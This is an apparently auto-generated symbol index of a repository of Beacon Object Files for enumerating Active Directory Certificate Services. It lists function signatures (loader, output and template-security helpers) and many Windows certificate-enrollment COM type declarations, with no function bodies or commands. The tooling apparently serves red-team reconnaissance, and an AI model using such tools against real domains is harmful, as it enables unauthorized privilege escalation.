function HRESULT (line 1045) | HRESULT _adcs_get_CertificateTemplateSecurity(BSTR bstrDacl)
FILE: AD-BOF/ADCS-BOF/src/enum/base.c
function bofstart (line 22) | int bofstart()
function internal_printf (line 29) | void internal_printf(const char* format, ...){
function printoutput (line 81) | void printoutput(BOOL done)
type loadedLibrary (line 105) | typedef struct loadedLibrary {
function BOOL (line 112) | BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
function FARPROC (line 140) | FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
function bofstop (line 218) | void bofstop()
FILE: AD-BOF/ADCS-BOF/src/enum/certenroll.h
type interface (line 53) | typedef interface IObjectId IObjectId;
type interface (line 59) | typedef interface IObjectIds
type interface (line 65) | typedef interface IBinaryConverter
type interface (line 71) | typedef interface IX500DistinguishedName
type interface (line 77) | typedef interface IX509EnrollmentStatus
type interface (line 83) | typedef interface ICspAlgorithm
type interface (line 89) | typedef interface ICspAlgorithms
type interface (line 95) | typedef interface ICspInformation
type interface (line 101) | typedef interface ICspInformations
type interface (line 107) | typedef interface ICspStatus
type interface (line 113) | typedef interface ICspStatuses
type interface (line 119) | typedef interface IX509PublicKey
type interface (line 125) | typedef interface IX509PrivateKey
type interface (line 131) | typedef interface IX509Extension
type interface (line 137) | typedef interface IX509Extensions
type interface (line 143) | typedef interface IX509ExtensionKeyUsage
type interface (line 149) | typedef interface IX509ExtensionEnhancedKeyUsage
type interface (line 155) | typedef interface IX509ExtensionTemplateName
type interface (line 161) | typedef interface IX509ExtensionTemplate
type interface (line 167) | typedef interface IAlternativeName
type interface (line 173) | typedef interface IAlternativeNames
type interface (line 179) | typedef interface IX509ExtensionAlternativeNames
type interface (line 185) | typedef interface IX509ExtensionBasicConstraints
type interface (line 191) | typedef interface IX509ExtensionSubjectKeyIdentifier
type interface (line 197) | typedef interface IX509ExtensionAuthorityKeyIdentifier
type interface (line 203) | typedef interface ISmimeCapability
type interface (line 209) | typedef interface ISmimeCapabilities
type interface (line 215) | typedef interface IX509ExtensionSmimeCapabilities
type interface (line 221) | typedef interface IPolicyQualifier
type interface (line 227) | typedef interface IPolicyQualifiers
type interface (line 233) | typedef interface ICertificatePolicy
type interface (line 239) | typedef interface ICertificatePolicies
type interface (line 245) | typedef interface IX509ExtensionCertificatePolicies
type interface (line 251) | typedef interface IX509ExtensionMSApplicationPolicies
type interface (line 257) | typedef interface IX509Attribute
type interface (line 263) | typedef interface IX509Attributes
type interface (line 269) | typedef interface IX509AttributeExtensions
type interface (line 275) | typedef interface IX509AttributeClientId
type interface (line 281) | typedef interface IX509AttributeRenewalCertificate
type interface (line 287) | typedef interface IX509AttributeArchiveKey
type interface (line 293) | typedef interface IX509AttributeArchiveKeyHash
type interface (line 299) | typedef interface IX509AttributeOSVersion
type interface (line 305) | typedef interface IX509AttributeCspProvider
type interface (line 311) | typedef interface ICryptAttribute
type interface (line 317) | typedef interface ICryptAttributes
type interface (line 323) | typedef interface ICertProperty
type interface (line 329) | typedef interface ICertProperties
type interface (line 335) | typedef interface ICertPropertyFriendlyName
type interface (line 341) | typedef interface ICertPropertyDescription
type interface (line 347) | typedef interface ICertPropertyAutoEnroll
type interface (line 353) | typedef interface ICertPropertyRequestOriginator
type interface (line 359) | typedef interface ICertPropertySHA1Hash
type interface (line 365) | typedef interface ICertPropertyKeyProvInfo
type interface (line 371) | typedef interface ICertPropertyArchived
type interface (line 377) | typedef interface ICertPropertyBackedUp
type interface (line 383) | typedef interface ICertPropertyEnrollment
type interface (line 389) | typedef interface ICertPropertyRenewal
type interface (line 395) | typedef interface ICertPropertyArchivedKeyHash
type interface (line 401) | typedef interface ICertPropertyEnrollmentPolicyServer
type interface (line 407) | typedef interface IX509SignatureInformation
type interface (line 413) | typedef interface ISignerCertificate
type interface (line 419) | typedef interface ISignerCertificates
type interface (line 425) | typedef interface IX509NameValuePair
type interface (line 431) | typedef interface IX509NameValuePairs
type interface (line 437) | typedef interface IX509CertificateTemplate
type interface (line 443) | typedef interface IX509CertificateTemplates
type interface (line 449) | typedef interface IX509CertificateTemplateWritable
type interface (line 455) | typedef interface ICertificationAuthority
type interface (line 461) | typedef interface ICertificationAuthorities
type interface (line 467) | typedef interface IX509EnrollmentPolicyServer
type interface (line 473) | typedef interface IX509PolicyServerUrl
type interface (line 479) | typedef interface IX509PolicyServerListManager
type interface (line 485) | typedef interface IX509CertificateRequest
type interface (line 491) | typedef interface IX509CertificateRequestPkcs10
type interface (line 497) | typedef interface IX509CertificateRequestPkcs10V2
type interface (line 503) | typedef interface IX509CertificateRequestCertificate
type interface (line 509) | typedef interface IX509CertificateRequestCertificate2
type interface (line 515) | typedef interface IX509CertificateRequestPkcs7
type interface (line 521) | typedef interface IX509CertificateRequestPkcs7V2
type interface (line 527) | typedef interface IX509CertificateRequestCmc
type interface (line 533) | typedef interface IX509CertificateRequestCmc2
type interface (line 539) | typedef interface IX509Enrollment
type interface (line 545) | typedef interface IX509Enrollment2
type interface (line 551) | typedef interface IX509EnrollmentHelper
type interface (line 557) | typedef interface IX509EnrollmentWebClassFactory
type interface (line 563) | typedef interface IX509MachineEnrollmentFactory
type class (line 571) | typedef class CObjectId CObjectId;
type CObjectId (line 573) | typedef struct CObjectId CObjectId;
type class (line 583) | typedef class CObjectIds CObjectIds;
type CObjectIds (line 585) | typedef struct CObjectIds CObjectIds;
type class (line 595) | typedef class CBinaryConverter
type CBinaryConverter (line 597) | typedef struct CBinaryConverter CBinaryConverter;
type class (line 607) | typedef class CX500DistinguishedName
type CX500DistinguishedName (line 609) | typedef struct CX500DistinguishedName CX500DistinguishedName;
type class (line 619) | typedef class CCspInformation
type CCspInformation (line 621) | typedef struct CCspInformation CCspInformation;
type class (line 631) | typedef class CCspInformations
type CCspInformations (line 633) | typedef struct CCspInformations CCspInformations;
type class (line 643) | typedef class CCspStatus CCspStatus;
type CCspStatus (line 645) | typedef struct CCspStatus CCspStatus;
type class (line 655) | typedef class CX509PublicKey
type CX509PublicKey (line 657) | typedef struct CX509PublicKey CX509PublicKey;
type class (line 667) | typedef class CX509PrivateKey
type CX509PrivateKey (line 669) | typedef struct CX509PrivateKey CX509PrivateKey;
type class (line 679) | typedef class CX509Extension
type CX509Extension (line 681) | typedef struct CX509Extension CX509Extension;
type class (line 691) | typedef class CX509Extensions
type CX509Extensions (line 693) | typedef struct CX509Extensions CX509Extensions;
type class (line 703) | typedef class CX509ExtensionKeyUsage
type CX509ExtensionKeyUsage (line 705) | typedef struct CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
type class (line 715) | typedef class CX509ExtensionEnhancedKeyUsage
type CX509ExtensionEnhancedKeyUsage (line 717) | typedef struct CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyU...
type class (line 727) | typedef class CX509ExtensionTemplateName
type CX509ExtensionTemplateName (line 729) | typedef struct CX509ExtensionTemplateName CX509ExtensionTemplateName;
type class (line 739) | typedef class CX509ExtensionTemplate
type CX509ExtensionTemplate (line 741) | typedef struct CX509ExtensionTemplate CX509ExtensionTemplate;
type class (line 751) | typedef class CAlternativeName
type CAlternativeName (line 753) | typedef struct CAlternativeName CAlternativeName;
type class (line 763) | typedef class CAlternativeNames
type CAlternativeNames (line 765) | typedef struct CAlternativeNames CAlternativeNames;
type class (line 775) | typedef class CX509ExtensionAlternativeNames
type CX509ExtensionAlternativeNames (line 777) | typedef struct CX509ExtensionAlternativeNames CX509ExtensionAlternativeN...
type class (line 787) | typedef class CX509ExtensionBasicConstraints
type CX509ExtensionBasicConstraints (line 789) | typedef struct CX509ExtensionBasicConstraints CX509ExtensionBasicConstra...
type class (line 799) | typedef class CX509ExtensionSubjectKeyIdentifier
type CX509ExtensionSubjectKeyIdentifier (line 801) | typedef struct CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectK...
type class (line 811) | typedef class CX509ExtensionAuthorityKeyIdentifier
type CX509ExtensionAuthorityKeyIdentifier (line 813) | typedef struct CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthor...
type class (line 823) | typedef class CSmimeCapability
type CSmimeCapability (line 825) | typedef struct CSmimeCapability CSmimeCapability;
type class (line 835) | typedef class CSmimeCapabilities
type CSmimeCapabilities (line 837) | typedef struct CSmimeCapabilities CSmimeCapabilities;
type class (line 847) | typedef class CX509ExtensionSmimeCapabilities
type CX509ExtensionSmimeCapabilities (line 849) | typedef struct CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabi...
type class (line 859) | typedef class CPolicyQualifier
type CPolicyQualifier (line 861) | typedef struct CPolicyQualifier CPolicyQualifier;
type class (line 871) | typedef class CPolicyQualifiers
type CPolicyQualifiers (line 873) | typedef struct CPolicyQualifiers CPolicyQualifiers;
type class (line 883) | typedef class CCertificatePolicy
type CCertificatePolicy (line 885) | typedef struct CCertificatePolicy CCertificatePolicy;
type class (line 895) | typedef class CCertificatePolicies
type CCertificatePolicies (line 897) | typedef struct CCertificatePolicies CCertificatePolicies;
type class (line 907) | typedef class CX509ExtensionCertificatePolicies
type CX509ExtensionCertificatePolicies (line 909) | typedef struct CX509ExtensionCertificatePolicies CX509ExtensionCertifica...
type class (line 919) | typedef class CX509ExtensionMSApplicationPolicies
type CX509ExtensionMSApplicationPolicies (line 921) | typedef struct CX509ExtensionMSApplicationPolicies CX509ExtensionMSAppli...
type class (line 931) | typedef class CX509Attribute
type CX509Attribute (line 933) | typedef struct CX509Attribute CX509Attribute;
type class (line 943) | typedef class CX509Attributes
type CX509Attributes (line 945) | typedef struct CX509Attributes CX509Attributes;
type class (line 955) | typedef class CX509AttributeExtensions
type CX509AttributeExtensions (line 957) | typedef struct CX509AttributeExtensions CX509AttributeExtensions;
type class (line 967) | typedef class CX509AttributeClientId
type CX509AttributeClientId (line 969) | typedef struct CX509AttributeClientId CX509AttributeClientId;
type class (line 979) | typedef class CX509AttributeRenewalCertificate
type CX509AttributeRenewalCertificate (line 981) | typedef struct CX509AttributeRenewalCertificate CX509AttributeRenewalCer...
type class (line 991) | typedef class CX509AttributeArchiveKey
type CX509AttributeArchiveKey (line 993) | typedef struct CX509AttributeArchiveKey CX509AttributeArchiveKey;
type class (line 1003) | typedef class CX509AttributeArchiveKeyHash
type CX509AttributeArchiveKeyHash (line 1005) | typedef struct CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
type class (line 1015) | typedef class CX509AttributeOSVersion
type CX509AttributeOSVersion (line 1017) | typedef struct CX509AttributeOSVersion CX509AttributeOSVersion;
type class (line 1027) | typedef class CX509AttributeCspProvider
type CX509AttributeCspProvider (line 1029) | typedef struct CX509AttributeCspProvider CX509AttributeCspProvider;
type class (line 1039) | typedef class CCryptAttribute
type CCryptAttribute (line 1041) | typedef struct CCryptAttribute CCryptAttribute;
type class (line 1051) | typedef class CCryptAttributes
type CCryptAttributes (line 1053) | typedef struct CCryptAttributes CCryptAttributes;
type class (line 1063) | typedef class CCertProperty
type CCertProperty (line 1065) | typedef struct CCertProperty CCertProperty;
type class (line 1075) | typedef class CCertProperties
type CCertProperties (line 1077) | typedef struct CCertProperties CCertProperties;
type class (line 1087) | typedef class CCertPropertyFriendlyName
type CCertPropertyFriendlyName (line 1089) | typedef struct CCertPropertyFriendlyName CCertPropertyFriendlyName;
type class (line 1099) | typedef class CCertPropertyDescription
type CCertPropertyDescription (line 1101) | typedef struct CCertPropertyDescription CCertPropertyDescription;
type class (line 1111) | typedef class CCertPropertyAutoEnroll
type CCertPropertyAutoEnroll (line 1113) | typedef struct CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
type class (line 1123) | typedef class CCertPropertyRequestOriginator
type CCertPropertyRequestOriginator (line 1125) | typedef struct CCertPropertyRequestOriginator CCertPropertyRequestOrigin...
type class (line 1135) | typedef class CCertPropertySHA1Hash
type CCertPropertySHA1Hash (line 1137) | typedef struct CCertPropertySHA1Hash CCertPropertySHA1Hash;
type class (line 1147) | typedef class CCertPropertyKeyProvInfo
type CCertPropertyKeyProvInfo (line 1149) | typedef struct CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
type class (line 1159) | typedef class CCertPropertyArchived
type CCertPropertyArchived (line 1161) | typedef struct CCertPropertyArchived CCertPropertyArchived;
type class (line 1171) | typedef class CCertPropertyBackedUp
type CCertPropertyBackedUp (line 1173) | typedef struct CCertPropertyBackedUp CCertPropertyBackedUp;
type class (line 1183) | typedef class CCertPropertyEnrollment
type CCertPropertyEnrollment (line 1185) | typedef struct CCertPropertyEnrollment CCertPropertyEnrollment;
type class (line 1195) | typedef class CCertPropertyRenewal
type CCertPropertyRenewal (line 1197) | typedef struct CCertPropertyRenewal CCertPropertyRenewal;
type class (line 1207) | typedef class CCertPropertyArchivedKeyHash
type CCertPropertyArchivedKeyHash (line 1209) | typedef struct CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
type class (line 1219) | typedef class CCertPropertyEnrollmentPolicyServer
type CCertPropertyEnrollmentPolicyServer (line 1221) | typedef struct CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollme...
type class (line 1231) | typedef class CSignerCertificate
type CSignerCertificate (line 1233) | typedef struct CSignerCertificate CSignerCertificate;
type class (line 1243) | typedef class CX509NameValuePair
type CX509NameValuePair (line 1245) | typedef struct CX509NameValuePair CX509NameValuePair;
type class (line 1255) | typedef class CX509CertificateRequestPkcs10
type CX509CertificateRequestPkcs10 (line 1257) | typedef struct CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
type class (line 1267) | typedef class CX509CertificateRequestCertificate
type CX509CertificateRequestCertificate (line 1269) | typedef struct CX509CertificateRequestCertificate CX509CertificateReques...
type class (line 1279) | typedef class CX509CertificateRequestPkcs7
type CX509CertificateRequestPkcs7 (line 1281) | typedef struct CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
type class (line 1291) | typedef class CX509CertificateRequestCmc
type CX509CertificateRequestCmc (line 1293) | typedef struct CX509CertificateRequestCmc CX509CertificateRequestCmc;
type class (line 1303) | typedef class CX509Enrollment
type CX509Enrollment (line 1305) | typedef struct CX509Enrollment CX509Enrollment;
type class (line 1315) | typedef class CX509EnrollmentWebClassFactory
type CX509EnrollmentWebClassFactory (line 1317) | typedef struct CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFac...
type class (line 1327) | typedef class CX509EnrollmentHelper
type CX509EnrollmentHelper (line 1329) | typedef struct CX509EnrollmentHelper CX509EnrollmentHelper;
type class (line 1339) | typedef class CX509MachineEnrollmentFactory
type CX509MachineEnrollmentFactory (line 1341) | typedef struct CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
type class (line 1351) | typedef class CX509EnrollmentPolicyActiveDirectory
type CX509EnrollmentPolicyActiveDirectory (line 1353) | typedef struct CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolic...
type class (line 1363) | typedef class CX509EnrollmentPolicyWebService
type CX509EnrollmentPolicyWebService (line 1365) | typedef struct CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebS...
type class (line 1375) | typedef class CX509PolicyServerListManager
type CX509PolicyServerListManager (line 1377) | typedef struct CX509PolicyServerListManager CX509PolicyServerListManager;
type class (line 1387) | typedef class CX509PolicyServerUrl
type CX509PolicyServerUrl (line 1389) | typedef struct CX509PolicyServerUrl CX509PolicyServerUrl;
type class (line 1399) | typedef class CX509CertificateTemplateADWritable
type CX509CertificateTemplateADWritable (line 1401) | typedef struct CX509CertificateTemplateADWritable CX509CertificateTempla...
type typedef (line 1421) | typedef typedef void VOID;
type CERTENROLL_OBJECTID (line 1428) | typedef
type WebSecurityLevel (line 1785) | typedef
type EncodingType (line 1793) | typedef
type PFXExportOptions (line 1814) | typedef
type ObjectIdGroupId (line 1821) | typedef
type ObjectIdPublicKeyFlags (line 1844) | typedef
type AlgorithmFlags (line 1851) | typedef
type X509EnrollmentAuthFlags (line 1858) | typedef
type IObjectIdVtbl (line 1919) | typedef struct IObjectIdVtbl
function interface (line 2004) | interface IObjectId
type IObjectIdsVtbl (line 2112) | typedef struct IObjectIdsVtbl
function interface (line 2188) | interface IObjectIds
type IBinaryConverterVtbl (line 2288) | typedef struct IBinaryConverterVtbl
function interface (line 2355) | interface IBinaryConverter
type X500NameFlags (line 2411) | typedef
type IX500DistinguishedNameVtbl (line 2473) | typedef struct IX500DistinguishedNameVtbl
function interface (line 2541) | interface IX500DistinguishedName
type X509CertificateEnrollmentContext (line 2600) | typedef
type EnrollmentEnrollStatus (line 2607) | typedef
type EnrollmentSelectionStatus (line 2618) | typedef
type EnrollmentDisplayStatus (line 2624) | typedef
type IX509EnrollmentStatusVtbl (line 2690) | typedef struct IX509EnrollmentStatusVtbl
function interface (line 2786) | interface IX509EnrollmentStatus
type X509ProviderType (line 2869) | typedef
type AlgorithmType (line 2898) | typedef
type AlgorithmOperationFlags (line 2909) | typedef
type ICspAlgorithmVtbl (line 2981) | typedef struct ICspAlgorithmVtbl
function interface (line 3071) | interface ICspAlgorithm
type ICspAlgorithmsVtbl (line 3190) | typedef struct ICspAlgorithmsVtbl
function interface (line 3272) | interface ICspAlgorithms
type X509KeySpec (line 3343) | typedef
type ICspInformationVtbl (line 3432) | typedef struct ICspInformationVtbl
function interface (line 3553) | interface ICspInformation
type ICspInformationsVtbl (line 3709) | typedef struct ICspInformationsVtbl
function interface (line 3811) | interface ICspInformations
type ICspStatusVtbl (line 3932) | typedef struct ICspStatusVtbl
function interface (line 4009) | interface ICspStatus
type ICspStatusesVtbl (line 4130) | typedef struct ICspStatusesVtbl
function interface (line 4225) | interface ICspStatuses
type KeyIdentifierHashAlgorithm (line 4302) | typedef
type IX509PublicKeyVtbl (line 4362) | typedef struct IX509PublicKeyVtbl
function interface (line 4446) | interface IX509PublicKey
type X509PrivateKeyExportFlags (line 4514) | typedef
type X509PrivateKeyUsageFlags (line 4523) | typedef
type X509PrivateKeyProtection (line 4532) | typedef
type X509PrivateKeyVerify (line 4539) | typedef
type IX509PrivateKeyVtbl (line 4748) | typedef struct IX509PrivateKeyVtbl
function interface (line 5030) | interface IX509PrivateKey
type IX509ExtensionVtbl (line 5285) | typedef struct IX509ExtensionVtbl
function interface (line 5356) | interface IX509Extension
type IX509ExtensionsVtbl (line 5459) | typedef struct IX509ExtensionsVtbl
function interface (line 5540) | interface IX509Extensions
type X509KeyUsageFlags (line 5611) | typedef
type IX509ExtensionKeyUsageVtbl (line 5660) | typedef struct IX509ExtensionKeyUsageVtbl
function interface (line 5744) | interface IX509ExtensionKeyUsage
type IX509ExtensionEnhancedKeyUsageVtbl (line 5842) | typedef struct IX509ExtensionEnhancedKeyUsageVtbl
function interface (line 5926) | interface IX509ExtensionEnhancedKeyUsage
type IX509ExtensionTemplateNameVtbl (line 6024) | typedef struct IX509ExtensionTemplateNameVtbl
function interface (line 6108) | interface IX509ExtensionTemplateName
type IX509ExtensionTemplateVtbl (line 6214) | typedef struct IX509ExtensionTemplateVtbl
function interface (line 6308) | interface IX509ExtensionTemplate
type AlternativeNameType (line 6386) | typedef
type IAlternativeNameVtbl (line 6452) | typedef struct IAlternativeNameVtbl
function interface (line 6535) | interface IAlternativeName
type IAlternativeNamesVtbl (line 6637) | typedef struct IAlternativeNamesVtbl
function interface (line 6709) | interface IAlternativeNames
type IX509ExtensionAlternativeNamesVtbl (line 6800) | typedef struct IX509ExtensionAlternativeNamesVtbl
function interface (line 6884) | interface IX509ExtensionAlternativeNames
type IX509ExtensionBasicConstraintsVtbl (line 6986) | typedef struct IX509ExtensionBasicConstraintsVtbl
function interface (line 7075) | interface IX509ExtensionBasicConstraints
type IX509ExtensionSubjectKeyIdentifierVtbl (line 7178) | typedef struct IX509ExtensionSubjectKeyIdentifierVtbl
function interface (line 7264) | interface IX509ExtensionSubjectKeyIdentifier
type IX509ExtensionAuthorityKeyIdentifierVtbl (line 7364) | typedef struct IX509ExtensionAuthorityKeyIdentifierVtbl
function interface (line 7450) | interface IX509ExtensionAuthorityKeyIdentifier
type ISmimeCapabilityVtbl (line 7548) | typedef struct ISmimeCapabilityVtbl
function interface (line 7609) | interface ISmimeCapability
type ISmimeCapabilitiesVtbl (line 7705) | typedef struct ISmimeCapabilitiesVtbl
function interface (line 7785) | interface ISmimeCapabilities
type IX509ExtensionSmimeCapabilitiesVtbl (line 7882) | typedef struct IX509ExtensionSmimeCapabilitiesVtbl
function interface (line 7966) | interface IX509ExtensionSmimeCapabilities
type PolicyQualifierType (line 8038) | typedef
type IPolicyQualifierVtbl (line 8086) | typedef struct IPolicyQualifierVtbl
function interface (line 8156) | interface IPolicyQualifier
type IPolicyQualifiersVtbl (line 8252) | typedef struct IPolicyQualifiersVtbl
function interface (line 8324) | interface IPolicyQualifiers
type ICertificatePolicyVtbl (line 8414) | typedef struct ICertificatePolicyVtbl
function interface (line 8474) | interface ICertificatePolicy
type ICertificatePoliciesVtbl (line 8564) | typedef struct ICertificatePoliciesVtbl
function interface (line 8636) | interface ICertificatePolicies
type IX509ExtensionCertificatePoliciesVtbl (line 8727) | typedef struct IX509ExtensionCertificatePoliciesVtbl
function interface (line 8811) | interface IX509ExtensionCertificatePolicies
type IX509ExtensionMSApplicationPoliciesVtbl (line 8909) | typedef struct IX509ExtensionMSApplicationPoliciesVtbl
function interface (line 8993) | interface IX509ExtensionMSApplicationPolicies
type IX509AttributeVtbl (line 9093) | typedef struct IX509AttributeVtbl
function interface (line 9156) | interface IX509Attribute
type IX509AttributesVtbl (line 9246) | typedef struct IX509AttributesVtbl
function interface (line 9318) | interface IX509Attributes
type IX509AttributeExtensionsVtbl (line 9409) | typedef struct IX509AttributeExtensionsVtbl
function interface (line 9485) | interface IX509AttributeExtensions
type RequestClientInfoClientId (line 9551) | typedef
type IX509AttributeClientIdVtbl (line 9613) | typedef struct IX509AttributeClientIdVtbl
function interface (line 9704) | interface IX509AttributeClientId
type IX509AttributeRenewalCertificateVtbl (line 9807) | typedef struct IX509AttributeRenewalCertificateVtbl
function interface (line 9885) | interface IX509AttributeRenewalCertificate
type IX509AttributeArchiveKeyVtbl (line 9988) | typedef struct IX509AttributeArchiveKeyVtbl
function interface (line 10077) | interface IX509AttributeArchiveKey
type IX509AttributeArchiveKeyHashVtbl (line 10177) | typedef struct IX509AttributeArchiveKeyHashVtbl
function interface (line 10255) | interface IX509AttributeArchiveKeyHash
type IX509AttributeOSVersionVtbl (line 10347) | typedef struct IX509AttributeOSVersionVtbl
function interface (line 10423) | interface IX509AttributeOSVersion
type IX509AttributeCspProviderVtbl (line 10525) | typedef struct IX509AttributeCspProviderVtbl
function interface (line 10613) | interface IX509AttributeCspProvider
type ICryptAttributeVtbl (line 10713) | typedef struct ICryptAttributeVtbl
function interface (line 10777) | interface ICryptAttribute
type ICryptAttributesVtbl (line 10877) | typedef struct ICryptAttributesVtbl
function interface (line 10958) | interface ICryptAttributes
type CERTENROLL_PROPERTYID (line 11029) | typedef
type ICertPropertyVtbl (line 11136) | typedef struct ICertPropertyVtbl
function interface (line 11220) | interface ICertProperty
type ICertPropertiesVtbl (line 11327) | typedef struct ICertPropertiesVtbl
function interface (line 11405) | interface ICertProperties
type ICertPropertyFriendlyNameVtbl (line 11495) | typedef struct ICertPropertyFriendlyNameVtbl
function interface (line 11587) | interface ICertPropertyFriendlyName
type ICertPropertyDescriptionVtbl (line 11684) | typedef struct ICertPropertyDescriptionVtbl
function interface (line 11776) | interface ICertPropertyDescription
type ICertPropertyAutoEnrollVtbl (line 11873) | typedef struct ICertPropertyAutoEnrollVtbl
function interface (line 11965) | interface ICertPropertyAutoEnroll
type ICertPropertyRequestOriginatorVtbl (line 12064) | typedef struct ICertPropertyRequestOriginatorVtbl
function interface (line 12159) | interface ICertPropertyRequestOriginator
type ICertPropertySHA1HashVtbl (line 12261) | typedef struct ICertPropertySHA1HashVtbl
function interface (line 12355) | interface ICertPropertySHA1Hash
type ICertPropertyKeyProvInfoVtbl (line 12452) | typedef struct ICertPropertyKeyProvInfoVtbl
function interface (line 12544) | interface ICertPropertyKeyProvInfo
type ICertPropertyArchivedVtbl (line 12641) | typedef struct ICertPropertyArchivedVtbl
function interface (line 12733) | interface ICertPropertyArchived
type ICertPropertyBackedUpVtbl (line 12837) | typedef struct ICertPropertyBackedUpVtbl
function interface (line 12938) | interface ICertPropertyBackedUp
type ICertPropertyEnrollmentVtbl (line 13053) | typedef struct ICertPropertyEnrollmentVtbl
function interface (line 13160) | interface ICertPropertyEnrollment
type ICertPropertyRenewalVtbl (line 13273) | typedef struct ICertPropertyRenewalVtbl
function interface (line 13373) | interface ICertPropertyRenewal
type ICertPropertyArchivedKeyHashVtbl (line 13475) | typedef struct ICertPropertyArchivedKeyHashVtbl
function interface (line 13569) | interface ICertPropertyArchivedKeyHash
type EnrollmentPolicyServerPropertyFlags (line 13644) | typedef
type PolicyServerUrlFlags (line 13650) | typedef
type ICertPropertyEnrollmentPolicyServerVtbl (line 13718) | typedef struct ICertPropertyEnrollmentPolicyServerVtbl
function interface (line 13845) | interface ICertPropertyEnrollmentPolicyServer
type IX509SignatureInformationVtbl (line 13999) | typedef struct IX509SignatureInformationVtbl
function interface (line 14102) | interface IX509SignatureInformation
type ISignerCertificateVtbl (line 14241) | typedef struct ISignerCertificateVtbl
function interface (line 14337) | interface ISignerCertificate
type ISignerCertificatesVtbl (line 14455) | typedef struct ISignerCertificatesVtbl
function interface (line 14532) | interface ISignerCertificates
type IX509NameValuePairVtbl (line 14626) | typedef struct IX509NameValuePairVtbl
function interface (line 14687) | interface IX509NameValuePair
type IX509NameValuePairsVtbl (line 14777) | typedef struct IX509NameValuePairsVtbl
function interface (line 14849) | interface IX509NameValuePairs
type EnrollmentTemplateProperty (line 14914) | typedef
type EnrollmentTemplateProperty (line 14970) | enum EnrollmentTemplateProperty
type IX509CertificateTemplateVtbl (line 14977) | typedef struct IX509CertificateTemplateVtbl
function interface (line 15030) | interface IX509CertificateTemplate
type IX509CertificateTemplatesVtbl (line 15122) | typedef struct IX509CertificateTemplatesVtbl
function interface (line 15204) | interface IX509CertificateTemplates
type CommitTemplateFlags (line 15275) | typedef
type EnrollmentTemplateProperty (line 15311) | enum EnrollmentTemplateProperty
type EnrollmentTemplateProperty (line 15315) | enum EnrollmentTemplateProperty
type IX509CertificateTemplateWritableVtbl (line 15325) | typedef struct IX509CertificateTemplateWritableVtbl
function interface (line 15396) | interface IX509CertificateTemplateWritable
type EnrollmentCAProperty (line 15458) | typedef
type EnrollmentCAProperty (line 15495) | enum EnrollmentCAProperty
type ICertificationAuthorityVtbl (line 15502) | typedef struct ICertificationAuthorityVtbl
function interface (line 15555) | interface ICertificationAuthority
type ICertificationAuthoritiesVtbl (line 15645) | typedef struct ICertificationAuthoritiesVtbl
function interface (line 15725) | interface ICertificationAuthorities
type X509EnrollmentPolicyLoadOption (line 15796) | typedef /* [public][public] */
type EnrollmentPolicyFlags (line 15805) | enum EnrollmentPolicyFlags
type PolicyServerUrlPropertyID (line 15809) | typedef
type X509EnrollmentPolicyExportFlags (line 15815) | typedef
type IX509EnrollmentPolicyServerVtbl (line 15926) | typedef struct IX509EnrollmentPolicyServerVtbl
function interface (line 16078) | interface IX509EnrollmentPolicyServer
type IX509PolicyServerUrlVtbl (line 16260) | typedef struct IX509PolicyServerUrlVtbl
function interface (line 16370) | interface IX509PolicyServerUrl
type IX509PolicyServerListManagerVtbl (line 16500) | typedef struct IX509PolicyServerListManagerVtbl
function interface (line 16577) | interface IX509PolicyServerListManager
type X509RequestType (line 16645) | typedef
type X509RequestInheritOptions (line 16654) | typedef
type InnerRequestLevel (line 16671) | typedef
type IX509CertificateRequestVtbl (line 16778) | typedef struct IX509CertificateRequestVtbl
function interface (line 16928) | interface IX509CertificateRequest
type Pkcs10AllowedSignatureTypes (line 17050) | typedef
type IX509CertificateRequestPkcs10Vtbl (line 17177) | typedef struct IX509CertificateRequestPkcs10Vtbl
function interface (line 17452) | interface IX509CertificateRequestPkcs10
type IX509CertificateRequestPkcs10V2Vtbl (line 17698) | typedef struct IX509CertificateRequestPkcs10V2Vtbl
function interface (line 18001) | interface IX509CertificateRequestPkcs10V2
type IX509CertificateRequestCertificateVtbl (line 18275) | typedef struct IX509CertificateRequestCertificateVtbl
function interface (line 18596) | interface IX509CertificateRequestCertificate
type IX509CertificateRequestCertificate2Vtbl (line 18870) | typedef struct IX509CertificateRequestCertificate2Vtbl
function interface (line 19212) | interface IX509CertificateRequestCertificate2
type IX509CertificateRequestPkcs7Vtbl (line 19512) | typedef struct IX509CertificateRequestPkcs7Vtbl
function interface (line 19700) | interface IX509CertificateRequestPkcs7
type IX509CertificateRequestPkcs7V2Vtbl (line 19877) | typedef struct IX509CertificateRequestPkcs7V2Vtbl
function interface (line 20083) | interface IX509CertificateRequestPkcs7V2
type IX509CertificateRequestCmcVtbl (line 20334) | typedef struct IX509CertificateRequestCmcVtbl
function interface (line 20620) | interface IX509CertificateRequestCmc
type IX509CertificateRequestCmc2Vtbl (line 20876) | typedef struct IX509CertificateRequestCmc2Vtbl
function interface (line 21191) | interface IX509CertificateRequestCmc2
type InstallResponseRestrictionFlags (line 21427) | typedef
type IX509EnrollmentVtbl (line 21537) | typedef struct IX509EnrollmentVtbl
function interface (line 21686) | interface IX509Enrollment
type IX509Enrollment2Vtbl (line 21842) | typedef struct IX509Enrollment2Vtbl
function interface (line 22020) | interface IX509Enrollment2
type WebEnrollmentFlags (line 22152) | typedef
type IX509EnrollmentHelperVtbl (line 22205) | typedef struct IX509EnrollmentHelperVtbl
function interface (line 22281) | interface IX509EnrollmentHelper
type IX509EnrollmentWebClassFactoryVtbl (line 22360) | typedef struct IX509EnrollmentWebClassFactoryVtbl
function interface (line 22413) | interface IX509EnrollmentWebClassFactory
